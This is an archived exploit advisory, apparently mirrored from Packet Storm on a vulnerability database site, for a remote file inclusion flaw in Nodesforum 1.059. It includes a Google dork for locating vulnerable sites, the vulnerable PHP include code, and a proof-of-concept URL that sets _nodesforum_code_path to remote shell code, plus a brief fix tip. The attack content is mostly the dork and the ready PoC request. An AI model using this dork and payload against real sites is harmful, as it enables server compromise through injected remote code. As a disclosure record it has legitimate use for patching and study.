Lucene search
K

Nodesforum 1.059 Remote File Inclusion

🗓️ 24 Jun 2011 00:00:00Reported by bd0rkType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Nodesforum 1.059 Remote File Inclusion Vulnerability, Google Dork, Vulnerable Code in 3rd_party_limits.ph

Code
`# Exploit Title: nodesforum 1.059 Remote File Inclusion Vulnerability  
# Google Dork: inurl: powered by Nodesforum  
# Date: 6/23/2011  
# Author: bd0rk ( bd0rk[at]hackermail.com )  
# Software-Download: http://home.nodesforum.com/download?file=nodesforum_1.059_with_bbcode_1.004.zip  
# Tested on: Ubuntu-Linux / WinVista  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
Vulnerable Code in 3rd_party_limits.php line 6 - 8  
  
--------------------------------------------------------------------------------------------------------------  
  
$limits_cache_url=$_nodesforum_code_path.'cache/'.$_nodesforum_db_table_name_modifier.'_3rd_party_limits.php';  
if(@filemtime($limits_cache_url) && @filemtime($limits_cache_url)>(time()-(24*3600*14)))  
{include($limits_cache_url);}  
  
--------------------------------------------------------------------------------------------------------------  
  
The parameter $limits_cache_url is declared with the other parameter $_nodesforum_code_path  
So we can use the declared.  
  
  
  
  
PoC: http://[target_host]/nodesforum/3rd_party_limits.php?_nodesforum_code_path=[RemoteShellCode]  
  
  
Fixtip: Declare $_nodesforum_code_path, likewise!  
  
  
Greetings: Kathrin J., Perle, x0r_32 and ZUBAIR ANJUM ;-)  
  
  
  
#### The 22 years old, german Hacker bd0rk #### <---white-hat  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation